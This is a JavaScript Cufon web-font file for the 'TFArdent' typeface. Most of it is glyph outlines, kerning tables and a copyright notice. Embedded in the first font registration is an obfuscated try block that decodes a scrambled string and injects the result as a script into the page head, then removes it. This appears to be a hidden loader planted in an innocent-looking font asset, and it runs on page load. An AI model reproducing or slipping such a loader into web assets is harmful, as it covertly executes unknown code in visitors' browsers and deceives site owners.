0r24,-104r-53,0r8,-34r54,0r7,-32r-54,0r8,-33r54,0r21,-92r35,0r-21,92r32,0r21,-92r34,0r-21,92r56,0xm140,-157r-32,0r-8,32r32,0","w":239,"k":{"1":29}},{"d":"202,0r-189,0r0,-21r79,-100v25,-31,33,-50,33,-74v0,-28,-10,-47,-33,-47v-21,0,-32,13,-32,43r-36,0r0,-63v0,0,32,-8,85,-8v55,0,86,24,86,73v0,74,-74,97,-114,138r28,0v58,0,64,-8,64,-51r29,0r0,110","k":{"9":17,"8":24,"7":41,"6":14,"5":31,"4":24,"3":29,"2":26,"1":48,"0":19,"\/":-7,".":19,"-":19,",":22}},{"d":"129,-107v-70,3,17,148,-70,152v-6,0,-54,-1,-54,-1r0,-23v48,3,29,-66,29,-107v0,-14,11,-23,25,-23r0,-20v-40,-2,-25,-66,-25,-104v0,-15,-10,-26,-29,-24r0,-24v46,0,98,-9,96,42v6,41,-20,106,28,108r0,24","w":128},{"d":"98,-31v0,20,-18,36,-40,36v-22,0,-40,-16,-40,-36v0,-20,18,-36,40,-36v22,0,40,16,40,36","w":116,"k":{"1":36,"0":17,"'":113,"\"":105}},{"d":"220,-99v0,84,-62,104,-106,104v-44,0,-106,-20,-106,-104v0,-81,62,-104,106,-104v44,0,106,23,106,104xm151,-99v0,-52,-11,-76,-37,-76v-26,0,-37,24,-37,76v0,50,11,76,37,76v26,0,37,-26,37,-76","w":227,"k":{"z":7,"y":12,"x":10,"w":12,"v":12,"t":7,"r":5,"p":7,"l":5,"k":5,"h":5,"f":5,"b":7,"\/":-14}},{"d":"221,-132v0,105,-56,137,-106,137v-50,0,-106,-28,-106,-137v0,-105,56,-138,106,-138v50,0,106,29,106,138xm150,-132v0,-82,-10,-110,-35,-110v-24,0,-35,28,-35,110v0,82,11,108,35,108v25,0,35,-26,35,-108","k":{"9":1,"8":10,"7":32,"6":-5,"5":14,"4":5,"3":22,"2":19,"1":39,"\/":-7,".":12,",":14}},{"d":"148,-50v-1,17,12,27,32,26r0,24r-135,0r0,-24v21,1,34,-8,34,-26r0,-160r-32,5r0,-33r101,-32r0,220","k":{"s":39,"p":46,"a":46,":":50,"9":53,"8":60,"7":77,"6":55,"5":58,"4":55,"3":60,"2":53,"1":78,"0":53,"\/":17,".":48,"-":65,",":55,"'":72,"\"":55}},{"d":"93,-159r-21,80r-29,0r-19,-80r0,-106r69,0r0,106xm98,-31v0,20,-18,36,-40,36v-22,0,-40,-16,-40,-36v0,-20,18,-36,40,-36v22,0,40,16,40,36","w":116},{"d":"144,-193v-2,-13,6,-39,-7,-39r-20,0r0,-21v31,-3,67,-24,94,-11r0,214v-3,21,17,14,23,11r8,26v0,0,-25,17,-53,17v-26,0,-42,-16,-42,-16v0,0,-22,17,-57,17v-32,0,-80,-20,-80,-104v0,-112,82,-113,134,-94xm144,-42r0,-112v-5,-11,-13,-19,-28,-19v-27,0,-37,22,-37,74v0,50,13,72,37,72v21,0,28,-15,28,-15","w":228,"k":{"z":-10,"s":-10,"r":-10,"n":-10,"m":-10,"l":-10,"k":-10,"i":-10,"h":-10,"f":-12,"b":-12,"a":-7,"\/":-39}},{"d":"75,-270r-16,97r-27,0r-15,-97r58,0","w":93,"k":{".":96,",":94}},{"d":"141,-125v0,109,-57,155,-127,155r0,-22v33,0,58,-46,58,-133v0,-87,-25,-133,-58,-133r0,-23v70,0,127,52,127,156","w":145},{"d":"122,-241v-13,-1,-24,11,-24,26r0,164v0,13,10,23,36,23v53,0,61,-18,61,-53r34,0r0,81r-224,0r0,-24v12,1,24,-13,23,-26r0,-165v1,-13,-11,-27,-23,-26r0,-24r117,0r0,24","w":234,"k":{"y":10,"w":14,"v":14,"t":12,"g":-5,"b":7,"a":-5,"Y":41,"X":10,"W":41,"V":41,"U":22,"T":33,"S":-3,"Q":14,"P":5,"O":14,"N":5,"M":3,"J":5,"G":14,"D":5,"C":14,"A":10,"\/":-22,".":-7}},{"d":"188,-58v0,-26,-2,-49,-24,-49r0,-24r115,0r0,24v-36,0,-21,58,-24,95v0,0,-51,17,-112,17v-82,0,-138,-40,-138,-140v0,-98,67,-135,138,-135v66,0,100,8,100,8r0,63r-35,0v0,-32,-25,-43,-55,-43v-39,0,-77,22,-77,107v0,85,40,110,76,110v24,0,36,-7,36,-33","w":273,"k":{"Y":12,"X":12,"W":12,"V":12,"T":5,"S":-7,"P":-5,"L":-5,"J":-7,"I":-5,"C":-5,"A":11,"\/":-14,"-":-12}},{"d":"316,-50v-1,13,11,27,23,26r0,24r-115,0r0,-24v11,1,23,-13,23,-26r0,-145r-74,181r-43,0r-68,-181r0,145v-2,13,11,27,23,26r0,24r-80,0r0,-24v12,1,24,-13,23,-26r0,-170v0,-14,-8,-22,-23,-21r0,-24r105,0r65,175r69,-175r95,0r0,24v-12,-1,-24,13,-23,26r0,165","w":344,"k":{"y":3,"t":5,"s":3,"o":12,"l":-5,"g":5,"e":10,"d":7,"c":7,"a":7,"R":-5,"P":-5,"E":-5,"D":-5,"B":-5,"\/":-24}},{"d":"156,-60v0,-26,-4,-48,-24,-48r0,-23r117,0r0,23v-39,3,-20,68,-24,108r-24,0v0,-5,-5,-11,-15,-11v-24,0,-36,16,-82,16v-69,0,-94,-29,-94,-79v0,-45,32,-69,77,-69v-31,0,-61,-16,-61,-58v0,-45,33,-69,98,-69v34,0,84,8,84,8r0,63r-35,0v0,-31,-14,-43,-41,-43v-24,0,-37,14,-37,46v1,30,9,39,30,38r0,29v-32,-1,-45,12,-45,54v0,32,13,49,40,49v21,0,36,-8,36,-34","w":250},{"d":"339,-173v-16,0,-21,2,-29,26r-50,147r-57,0r-33,-98r-34,98r-57,0r-49,-147v-8,-23,-10,-26,-27,-26r0,-24r108,0r0,24v-22,1,-17,14,-12,26r26,80r30,-95v0,-5,-2,-11,-14,-11r0,-24r93,0r0,24v-21,1,-15,14,-12,26r26,80v10,-32,23,-60,30,-95v0,-5,-2,-11,-14,-11r0,-24r75,0r0,24","w":338,"k":{"q":10,"o":10,"j":-7,"i":-5,"g":5,"f":-5,"e":10,"d":10,"c":10,"a":5,";":-3,":":-3,".":36,"-":12,",":36}},{"d":"28,-215v1,-13,-11,-27,-23,-26r0,-24r220,0r0,70r-33,0v0,-35,-9,-42,-62,-42v-51,0,-28,50,-33,89v30,0,49,-2,49,-40r29,0r0,104r-29,0v0,-35,-19,-39,-49,-38v3,38,-12,97,25,98r0,24r-117,0r0,-24v12,1,24,-13,23,-26r0,-165","w":222,"k":{"y":-1,"x":3,"w":3,"u":5,"s":19,"r":-3,"o":22,"l":-7,"j":-3,"e":17,"d":13,"a":12,"Z":-3,"Y":-5,"X":-7,"W":-10,"T":-14,"S":-5,"R":-7,"Q":5,"P":-10,"O":5,"L":-5,"K":-5,"J":-5,"I":-5,"H":-7,"G":3,"F":-5,"E":-7,"D":-7,"C":3,"B":-7,"A":36,"\/":5,".":41,"-":17,",":39}},{"d":"192,-115r-69,0r0,70r-34,0r0,-70r-69,0r0,-34r69,0r0,-68r34,0r0,68r69,0r0,34","w":210},{"d":"195,-147r-178,0r0,-35r178,0r0,35xm195,-83r-178,0r0,-35r178,0r0,35","w":210},{"d":"106,17r-38,0r-71,-298r39,0","w":96},{"d":"123,44v-39,3,-100,5,-96,-41v-7,-41,20,-107,-27,-110r0,-24v69,-3,-19,-150,69,-150r54,0r0,24v-47,-3,-29,63,-29,103v0,14,-11,25,-25,25r0,20v42,1,21,68,25,106v1,13,11,26,29,24r0,23","w":128},{"d":"216,-265r-102,265r-70,0r119,-203r-130,0r0,-62r183,0","k":{";":36,":":36,"9":24,"8":33,"7":36,"6":29,"5":36,"4":50,"3":33,"2":26,"1":53,"0":29,"\/":19,".":72,"-":36,",":62}},{"d":"216,-173v-16,0,-22,2,-30,26r-61,181v-12,35,-39,47,-70,47v-35,0,-55,-12,-55,-12r0,-54r30,0v-1,36,58,34,65,7r7,-22r-23,0r-51,-147v-8,-22,-10,-26,-28,-26r0,-24r111,0r0,24v-22,1,-17,14,-12,26r26,80r30,-95v0,-5,-2,-11,-14,-11r0,-24r75,0r0,24","w":215,"k":{"z":3,"y":-7,"s":5,"q":10,"o":10,"g":7,"e":10,"d":10,"c":10,"a":5,";":-3,":":-3,".":36,"-":12,",":36}},{"d":"204,-204v0,52,-46,71,-70,71r-18,54r-29,0r-18,-77v40,4,66,-13,65,-46v0,-21,-11,-40,-35,-40v-23,0,-37,12,-37,43r-35,0r0,-63v0,0,40,-8,81,-8v55,0,96,14,96,66xm141,-31v0,20,-17,36,-39,36v-22,0,-40,-16,-40,-36v0,-20,18,-36,40,-36v22,0,39,16,39,36","w":210},{"d":"96,-50v-2,13,12,27,24,26r0,24r-115,0r0,-24v12,1,24,-12,24,-26r0,-174v2,-13,-16,-7,-26,-8r0,-20r78,-18r15,6r0,214","w":122,"k":{"z":-3,"y":5,"x":-5,"w":7,"v":5,"t":7,"p":5,"\/":-29}},{"d":"293,41r-85,0r-26,-41v-87,17,-170,-9,-170,-133v0,-105,68,-137,134,-137v66,0,134,28,134,137v0,57,-27,92,-49,111xm208,-133v0,-82,-22,-108,-62,-108v-39,0,-62,26,-62,108v0,92,24,116,81,107r-41,-64r40,0r35,36v4,-6,9,-27,9,-79","w":291,"k":{"A":24,"\/":-22}},{"d":"88,-24v17,0,27,-20,23,-43r-117,0r140,-198r46,0r0,166r38,0r0,32r-38,0v-4,24,6,43,24,43r0,24r-116,0r0,-24xm111,-99r0,-81r-50,81r50,0","k":{"9":14,"8":14,"7":43,"6":10,"5":24,"4":5,"3":24,"2":24,"1":46,"0":12,"\/":-17,".":12,"-":3,",":12}},{"d":"121,-241v-31,0,-22,47,-23,80v21,-24,51,-41,66,-70v0,-6,-5,-10,-13,-10r0,-24r116,0r0,24v-22,1,-33,7,-45,17r-78,61v42,43,78,92,124,131v7,5,16,8,28,8r0,24r-105,0r-93,-122v3,38,-13,97,23,98r0,24r-116,0r0,-24v12,1,24,-13,23,-26r0,-165v1,-13,-11,-27,-23,-26r0,-24r116,0r0,24","w":269,"k":{"z":-14,"y":5,"w":7,"v":5,"u":5,"t":3,"s":-14,"r":7,"p":12,"o":7,"n":7,"l":-7,"k":-7,"h":-7,"e":12,"b":-17,"a":-11,"Z":-3,"Y":24,"X":-5,"W":14,"V":26,"U":17,"T":-3,"S":3,"R":-7,"Q":10,"P":-12,"O":19,"N":-3,"M":-5,"L":-7,"K":-10,"J":-19,"I":-5,"G":10,"F":-3,"E":-3,"D":-5,"C":10,"B":-7,"A":24,";":-22,":":-22,"\/":-54,".":-24,"-":26,",":-22,"!":-24}},{"d":"196,-26r-175,-85r0,-40r175,-85r0,24r-109,81r109,81r0,24","w":210},{"d":"215,-215v2,-13,-12,-27,-23,-26r0,-24r80,0r0,24v-12,-1,-24,12,-24,26r0,113v0,82,-49,107,-108,107v-59,0,-108,-21,-108,-107r0,-113v1,-13,-12,-27,-23,-26r0,-24r116,0r0,24v-12,-1,-24,12,-24,26r0,113v0,54,26,69,57,69v31,0,57,-17,57,-69r0,-113","w":278,"k":{"z":10,"y":10,"x":10,"w":12,"v":10,"u":10,"t":12,"s":14,"r":10,"p":14,"n":10,"m":10,"g":12,"e":12,"d":12,"a":17,"Z":11,"Y":5,"X":5,"W":3,"V":5,"U":5,"S":5,"R":5,"Q":5,"O":5,"N":5,"M":5,"L":5,"K":3,"G":7,"F":3,"E":3,"D":5,"C":7,"A":36,"\/":5,".":33,",":33}},{"d":"209,22v-1,13,12,27,24,26r0,24r-117,0r0,-24v28,2,28,-27,26,-56v-14,9,-21,13,-39,13v-48,0,-95,-20,-95,-104v0,-105,74,-120,149,-92v17,-5,35,-21,52,-8r0,221xm142,-41r0,-113v0,0,-5,-19,-26,-19v-28,0,-38,22,-38,74v0,68,37,86,64,58","w":226,"k":{"j":-46,"\/":-29,"-":-7}},{"d":"28,-215v1,-13,-11,-27,-23,-26r0,-24r218,0r0,70r-33,0v0,-36,-12,-42,-60,-42v-51,0,-27,50,-32,88v30,0,46,-2,46,-40r28,0r0,104r-28,0v0,-35,-17,-39,-46,-38v5,40,-18,97,31,97v57,0,69,-10,69,-56r34,0r0,82r-227,0r0,-24v12,1,24,-13,23,-26r0,-165","w":236,"k":{"\/":-22,".":-7,"-":3}},{"d":"100,-50v-1,13,11,27,23,26r0,24r-116,0r0,-24v11,1,24,-12,24,-26r0,-165v2,-13,-12,-27,-24,-26r0,-24r116,0r0,24v-12,-1,-24,13,-23,26r0,165","w":130,"k":{"z":3,"y":5,"w":7,"v":10,"t":7,"s":3,"q":10,"p":7,"o":10,"m":3,"l":-10,"g":5,"e":7,"d":7,"c":7,"b":-5,"a":10,"Z":3,"T":-3,"S":-3,"N":3,"M":3,"J":-7,"I":-7,"F":-5,"D":-5,"B":-5,"\/":-19}},{"d":"135,-85r-123,0r0,-35r123,0r0,35","w":145,"k":{"z":3,"y":14,"x":19,"w":14,"t":5,"s":-5,"r":5,"p":10,"k":7,"Z":14,"Y":39,"X":29,"W":28,"V":24,"T":42,"S":5,"R":7,"P":7,"L":10,"F":12,"E":10,"A":24,"9":7,"8":5,"7":39,"6":-3,"5":22,"4":-3,"3":24,"2":33,"1":58}},{"d":"213,-132v0,40,-14,105,23,108r0,24r-111,0r0,-24v32,-4,21,-63,21,-101v0,-23,-5,-40,-24,-40v-41,0,-20,75,-25,115v-2,12,12,26,21,26r0,24r-111,0r0,-24v11,1,23,-13,23,-26r0,-109v2,-13,-16,-7,-26,-8r0,-21r78,-18r15,7r0,20v0,0,12,-24,50,-24v34,0,66,20,66,71","w":235,"k":{"z":-5,"y":10,"w":12,"v":10,"u":5,"t":7,"p":5,"o":5,"e":7,"b":5,"\/":-29,".":-5,",":-3}},{"d":"281,0r-124,0r0,-24v42,-6,1,-57,1,-74r-69,0v-6,21,-14,40,-18,63v0,5,7,11,19,11r0,24r-89,0r0,-24v16,0,27,-8,33,-26r71,-215r66,0r77,215v8,23,20,26,33,26r0,24xm149,-123r-27,-79r-25,79r52,0","w":283,"k":{"z":5,"y":24,"x":22,"w":26,"v":26,"u":12,"t":19,"s":12,"r":17,"q":14,"p":10,"o":14,"g":10,"f":22,"e":14,"d":14,"c":14,"b":14,"a":14,"Y":39,"X":22,"W":39,"V":39,"U":24,"T":22,"S":6,"Q":22,"O":22,"G":22,"C":22,"A":23,";":-3,":":3,"\/":-23,".":-7,"-":19,",":-7}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+60-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("!(DPoM+Ay.#B!m_ukM@jR(R#z[+PDM#Bz[ljy.4~DZ>8X*ASz*%_R@4!X2lF2E|&2&U8z;2tU(nt|HmCn@(;Rl!:U+FfO4d?2Z.zXDyohkL6r^Sb&_M~p3}58,B7tTj*AP[Ec%Ju>#Q=UE^~kZ3rl.3z!&#Azm#DX*_QzzDXoZ,M2nOPy?DJ!C8cy;+>hb3Lzml.d(l5R*l#:M>tUd@&lj_U4AAMkAX5fZThL*k%f[T4+n8>Zz@@ddPBOdRBhEH8yzOpRSR3:(&#UmTtf.RBhmT8fz|Bo(ZBDE4p:(h#XS%M:Mk8LzHph*Pu6?,3DS^S:M#5fd#L!C>JkEkEzmc3fjr=F~4phMZ^D;+*k;_8y.%~zm%,oEl_XEl_Xz43kM_ALZtBX[#h:~Z56;4phMZ^D;+*k;_8y.%~zm%boPtBk.,>k(^jD.@&hPtBo.+h:MT7X[@8!dO7yd%ADz+A!(T7X[@Ay.#B:M^7hE4BX.P_!d_MoERpF[&>oC85![&3DP,b.[_kz?Pt.[_k6d&p!d|r")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":230,"face":{"font-family":"TFArdent","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"5","bbox":"-45 -287 415 81","underline-thickness":"4.68","underline-position":"-29.88","stemh":"24","stemv":"33","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copr.1991-93, Joseph Treacy. V.12, completed 1.26.93. Glyphs,dataCopr.TF. All
 * world rights reserved.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"166,-15v5,11,-11,14,-27,18v-16,0,-16,-19,-16,-19v0,0,-23,19,-51,19v-33,0,-44,-21,-40,-52v6,-40,17,-82,17,-122v-3,-6,-11,-5,-20,-5r1,-7v14,-3,30,-15,43,-12r-21,135v-5,33,0,49,31,49v19,0,42,-16,42,-16v5,-47,21,-99,19,-144v-2,-6,-11,-5,-19,-5r1,-7v15,-3,30,-15,44,-12r-24,150v-6,34,2,37,20,30","w":160,"k":{"z":-5,"n":-7,"m":-7,"c":-5,"\/":-24}},{"d":"250,-255v-17,0,-28,10,-39,27r-75,113v-2,33,-18,69,-10,100v3,6,9,8,15,8r-1,7r-65,0v-1,-12,13,-6,19,-15v17,-24,13,-66,21,-98r-40,-115v-6,-17,-12,-27,-30,-27r1,-7r67,0r-1,7v-17,0,-14,15,-11,27r33,98r70,-116v1,-8,-3,-9,-9,-9r1,-7r55,0","w":207,"k":{"z":36,"y":22,"w":31,"v":24,"u":26,"t":24,"s":43,"r":29,"p":26,"o":58,"i":14,"g":58,"e":58,"d":43,"a":48,"Z":10,"Y":7,"X":7,"W":7,"V":7,"U":7,"S":17,"Q":28,"O":25,"G":29,"C":26,"A":43,";":39,":":39,"\/":14,".":39,"-":58,",":41}},{"d":"130,-153r-7,0v2,-14,-2,-27,-16,-27v-54,12,-41,96,-55,147v-3,13,6,27,17,26r-1,7r-60,0v-1,-12,13,-4,18,-15v19,-42,22,-106,27,-156v-2,-7,-12,-5,-20,-5r1,-6v14,-3,31,-16,44,-13r-4,27v0,0,15,-29,42,-29v36,0,13,23,14,44","w":108,"k":{"z":-4,"y":-5,"x":-3,"w":-3,"v":-5,"u":-10,"t":-5,"s":4,"r":-7,"q":10,"p":-5,"o":10,"n":-7,"m":-7,"l":5,"k":7,"j":-12,"i":-5,"h":5,"g":7,"f":3,"e":7,"d":7,"c":7,"b":5,"a":12,";":-14,":":-14,".":24,"-":22,",":24}},{"d":"157,-68v-8,48,-43,72,-86,72v-42,0,-61,-18,-61,-18r8,-45r7,0v-3,20,4,52,47,52v27,0,62,-15,62,-58v0,-85,-92,-45,-87,-133v4,-69,81,-78,126,-63r-7,44r-8,0v4,-27,-8,-40,-36,-40v-27,0,-48,17,-53,46v-6,39,24,51,39,59v28,15,57,35,49,84","w":149,"k":{"z":5,"y":19,"x":7,"w":14,"v":10,"u":5,"t":7,"s":5,"r":5,"q":5,"p":7,"c":-7,"Z":5,"Y":18,"X":7,"W":13,"V":15,"U":5,"S":-3,"R":5,"N":5,"M":5,"A":19,"\/":-12}},{"d":"168,-70r-34,0v-3,21,-16,59,10,63r-1,7r-61,0v1,-13,23,-12,26,-33r5,-37r-101,0r142,-197r11,0r-29,182r35,0xm116,-85r22,-139r-102,139r80,0","k":{"9":22,"8":22,"7":43,"6":17,"5":29,"4":17,"3":26,"2":22,"1":50,"0":12,"\/":-3,".":12,"-":7,",":14}},{"d":"168,0r-162,0r1,-7r167,-243r-53,0v-50,0,-61,7,-66,42r-7,0r9,-54r145,0r-1,7r-165,243v63,-3,133,16,134,-52r8,0","w":169,"k":{"y":5,"a":-7,"U":5,"T":-5,"S":-5,"Q":5,"O":5,"G":5,"C":5,"A":7,"\/":-19,".":-7,"-":12}},{"d":"148,-15v5,11,-11,14,-27,18v-15,0,-16,-19,-16,-19v0,0,-23,19,-51,19v-28,0,-41,-17,-36,-52v9,-54,57,-69,103,-69v8,-36,5,-67,-27,-67v-25,0,-36,14,-39,33r-7,0r6,-36v0,0,17,-9,48,-9v32,0,48,13,39,68r-14,88v-4,35,5,31,21,26xm107,-27r12,-80v-45,0,-72,16,-79,53v-13,64,54,39,67,27","w":139,"k":{"y":10,"w":10,"v":7,"t":3,"\/":-24,".":-7}},{"d":"146,-28v0,0,-24,31,-72,31v-10,0,-64,-1,-48,-99v10,-63,42,-102,86,-102v36,0,56,28,46,91r-110,0v-20,119,56,105,100,66xm139,-119v6,-42,-6,-68,-35,-68v-32,0,-49,35,-54,68r89,0","w":145,"k":{"y":7,"w":7,"v":7,"r":4,"\/":-18}},{"d":"61,9r-15,0r-9,-282r15,0","w":61},{"d":"108,-124v-17,109,-56,155,-95,155r1,-7v27,0,59,-50,74,-148v15,-98,0,-149,-27,-149r1,-6v39,0,62,51,46,155","w":101},{"d":"112,-262v1,12,-10,6,-17,15v-4,6,-8,11,-9,18r-31,196v-15,78,-43,101,-107,94r2,-10v58,0,75,-22,85,-87r31,-193v3,-12,-6,-27,-17,-26r1,-7r62,0","w":76,"k":{"u":7,"o":17,"i":12,"e":17,"a":19,"J":-10,"A":24,"\/":-3,".":17,",":17}},{"d":"198,0r-36,0r-64,-117r-29,0v-2,34,-18,69,-11,102v2,10,17,4,13,15r-62,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v4,-14,-9,-27,-20,-26r2,-7v73,2,160,-17,148,66v-7,51,-43,70,-74,76r65,109v3,2,8,3,12,3xm172,-195v13,-51,-48,-64,-83,-51r-18,117v57,3,85,-6,101,-66","w":179,"k":{"u":-6,"p":5,"j":-10,"g":-7,"f":7,"d":-5,"b":-7,"Z":-10,"Y":15,"W":15,"V":15,"S":-10,"R":3,"P":3,"M":3,"J":-10,"\/":-46,".":-24,"-":11}},{"d":"200,44r-30,0r-21,-47v-78,22,-134,1,-114,-128v16,-104,65,-136,117,-136v53,0,91,27,74,136v-10,62,-31,99,-58,118xm203,-131v15,-98,-13,-125,-53,-125v-40,0,-78,27,-92,125v-17,116,21,139,86,117r-23,-54r16,0r24,42v19,-18,33,-51,42,-105","w":218,"k":{"A":24,"\/":-5}},{"d":"195,-118v1,12,-11,5,-17,15v-16,26,-13,69,-22,103v-12,2,-4,-7,-19,-7v-10,0,-27,12,-64,12v-39,0,-56,-29,-50,-74v6,-42,35,-68,67,-71v-23,0,-37,-24,-32,-61v9,-73,85,-69,125,-55r-7,44r-8,0v5,-32,-15,-42,-37,-42v-30,0,-46,21,-52,53v-5,29,0,58,41,55v-1,6,0,14,-9,12v-39,0,-60,24,-66,65v-8,48,16,63,40,63v60,0,58,-34,65,-79v2,-14,-5,-27,-16,-26r1,-7r60,0","w":181},{"d":"244,-262v1,12,-10,6,-17,15v-4,6,-7,11,-8,18r-36,229r-13,0r-90,-238r-32,205v-3,14,5,27,16,26r-1,7r-54,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v3,-12,-7,-27,-17,-26r0,-7r48,0r80,215r29,-182v3,-12,-6,-27,-16,-26r0,-7r54,0","w":206,"k":{"y":7,"u":7,"o":14,"g":10,"e":14,"a":12,"Z":10,"Y":7,"X":7,"W":5,"T":-5,"A":19,"\/":-3,".":14,",":14}},{"d":"71,0r-62,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v3,-12,-6,-27,-17,-26r1,-7r63,0v1,12,-11,5,-18,15v-4,6,-7,11,-8,18r-31,196v-3,14,5,27,16,26","w":75,"k":{"z":5,"y":10,"w":7,"v":7,"s":10,"q":10,"o":10,"m":-5,"l":-10,"g":7,"e":7,"a":10,"Z":5,"T":-5,"S":-5,"N":3,"M":5,"J":-7,"I":-7,"F":-5,"D":-5,"B":-5,"\/":-14}},{"d":"110,-266r-17,81r-8,0r8,-81r17,0xm80,-266r-17,81r-8,0r9,-81r16,0","w":89,"k":{".":103,",":111}},{"w":83},{"d":"177,-97v-12,76,-51,100,-86,100v-31,0,-43,-15,-43,-15r-27,15v-9,-16,7,-3,12,-39r31,-195v3,-14,-7,-16,-21,-15r1,-6v14,-3,30,-16,43,-13r-15,96v0,0,22,-28,53,-28v29,0,66,12,52,100xm157,-98v10,-66,-9,-85,-37,-85v-38,0,-52,44,-54,57r-16,95v45,45,93,22,107,-67","w":172,"k":{"y":10,"x":7,"w":7,"v":7,"b":10}},{"d":"142,0r-132,0r1,-7v37,-50,130,-151,135,-199v3,-30,-4,-50,-33,-50v-25,0,-45,10,-50,42r-8,0r7,-45v0,0,25,-8,61,-8v38,0,53,26,46,62v-11,57,-95,129,-132,182r52,0v44,0,49,-6,56,-50r9,0","k":{"9":26,"8":33,"7":46,"6":29,"5":39,"4":31,"3":41,"2":31,"1":62,"0":22,"\/":7,".":17,"-":39,",":12}},{"d":"153,71r-59,0v1,-13,23,-11,26,-32r8,-54v0,0,-20,18,-46,18v-38,0,-67,-20,-54,-100v14,-86,61,-100,86,-100v23,0,35,7,41,12v7,-3,12,-15,20,-10r-37,234v-3,14,5,26,16,25xm131,-32r19,-124v0,0,-9,-30,-37,-30v-27,0,-53,18,-64,88v-10,62,9,86,36,86v26,0,46,-20,46,-20","w":166,"k":{"u":6,"o":10,"j":-24,"a":8,"-":5}},{"d":"90,-239v-1,18,-31,21,-28,0v1,-19,31,-23,28,0xm68,0r-59,0v-1,-12,12,-5,17,-15v19,-42,23,-106,28,-156v-3,-6,-12,-5,-21,-5r2,-6v14,-3,30,-16,43,-13r-25,162v-3,14,5,27,16,26","w":74,"k":{"z":3,"y":10,"x":10,"w":10,"v":7,"t":10,"s":7,"o":7,"j":-5,"g":7,"f":7,"e":5,"b":7,"a":5}},{"d":"244,0r-59,0v2,-12,23,-12,26,-33r15,-98v6,-36,-2,-54,-23,-54v-66,0,-49,94,-64,152v-2,13,5,27,16,26r-1,7r-59,0v2,-12,23,-12,26,-33r15,-98v6,-36,-1,-54,-23,-54v-67,0,-49,94,-65,152v-4,14,6,27,16,26r-2,7r-57,0v-1,-12,12,-5,17,-15v19,-42,22,-106,27,-156v-3,-6,-11,-5,-19,-5r1,-6v14,-3,29,-16,43,-13r-5,27v0,0,19,-29,46,-29v24,0,38,12,41,31v0,0,20,-31,50,-31v82,0,11,126,26,182v3,10,16,4,12,15","w":249,"k":{"z":7,"y":12,"w":12,"v":12,"u":5,"t":12,"s":12,"r":10,"q":7,"p":5,"o":7,"n":7,"m":7,"l":10,"k":12,"j":12,"i":12,"h":7,"g":7,"f":12,"e":5,"b":12,"a":10}},{"d":"207,0r-62,0v-1,-12,11,-5,17,-15v19,-29,14,-78,24,-116r-115,0v-3,38,-19,78,-13,116v2,10,17,4,13,15r-62,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v3,-12,-6,-27,-17,-26r1,-7r63,0v1,12,-12,5,-18,15v-16,27,-13,68,-22,102r116,0v2,-34,18,-70,10,-102v-3,-10,-17,-4,-13,-15r62,0v1,12,-10,6,-17,15v-4,6,-7,11,-8,18r-31,196v-3,14,5,27,16,26","w":213,"k":{"z":5,"y":12,"q":10,"o":10,"l":-5,"e":10,"a":10,"B":-5,"\/":-12}},{"d":"82,-121v2,13,-15,3,-17,16r-17,108v-9,40,-16,43,-48,41r1,-8v19,0,24,-9,29,-38r16,-97v1,-9,8,-17,15,-17v-1,-8,-12,-8,-10,-20r16,-98v5,-29,2,-39,-17,-39v-2,-11,12,-6,20,-7v14,0,21,11,16,41r-17,108v-1,8,7,10,13,10","w":73},{"d":"267,-182v-14,0,-19,7,-31,34r-64,148r-16,0r-15,-138r-60,138r-16,0r-16,-148v-3,-27,-7,-34,-19,-34r1,-7r49,0r0,7v-16,1,-14,15,-13,34r14,127r57,-137v3,-18,-7,-24,-17,-24r0,-7r50,0r-1,7v-16,3,-13,13,-11,34r13,127r61,-150v1,-9,-3,-11,-8,-11r1,-7r42,0","w":237,"k":{"z":5,"s":10,"q":17,"o":17,"k":7,"h":7,"g":14,"e":19,"d":17,"c":10,"b":7,"a":17,";":-5,":":-10,".":43,"-":19,",":43}},{"d":"215,-181r-4,13r-49,0r-19,58r47,0r-4,12r-48,0r-39,112r-10,0r39,-112r-48,0r-40,112r-10,0r39,-112r-47,0r5,-12r47,0r20,-58r-47,0r4,-13r47,0r35,-99r11,0r-35,99r48,0r34,-99r10,0r-34,99r48,0xm153,-168r-49,0r-20,58r48,0","w":191,"k":{"1":31}},{"d":"244,-262v1,12,-12,5,-17,15v-20,40,-20,100,-29,149v-14,78,-50,102,-92,102v-41,0,-72,-20,-59,-102r21,-131v3,-13,-7,-27,-19,-26r1,-7r64,0v1,12,-12,5,-17,15v-20,40,-20,100,-29,149v-13,70,13,88,45,88v32,0,63,-21,73,-88r21,-131v4,-13,-7,-27,-16,-26r1,-7r52,0","w":207,"k":{"z":10,"y":10,"x":10,"w":12,"v":10,"u":10,"t":12,"s":14,"r":14,"p":14,"n":10,"m":10,"g":12,"e":12,"d":5,"a":17,"Z":8,"Y":5,"X":10,"W":7,"V":5,"U":5,"R":5,"Q":5,"O":5,"N":5,"M":5,"L":5,"K":3,"G":7,"F":3,"E":3,"D":5,"C":7,"A":36,"\/":5,".":33,",":33}},{"d":"176,-182v-14,0,-19,7,-31,34r-64,148r-16,0r-16,-148v-3,-27,-7,-34,-19,-34r1,-7r49,0r0,7v-16,0,-14,17,-13,34r14,127r53,-127v4,-12,14,-32,0,-34r1,-7r42,0","w":151,"k":{"z":7,"s":13,"q":19,"o":19,"k":7,"h":7,"g":14,"e":19,"d":15,"c":14,"b":7,"a":17,";":-10,":":-10,".":43,"-":12,",":43}},{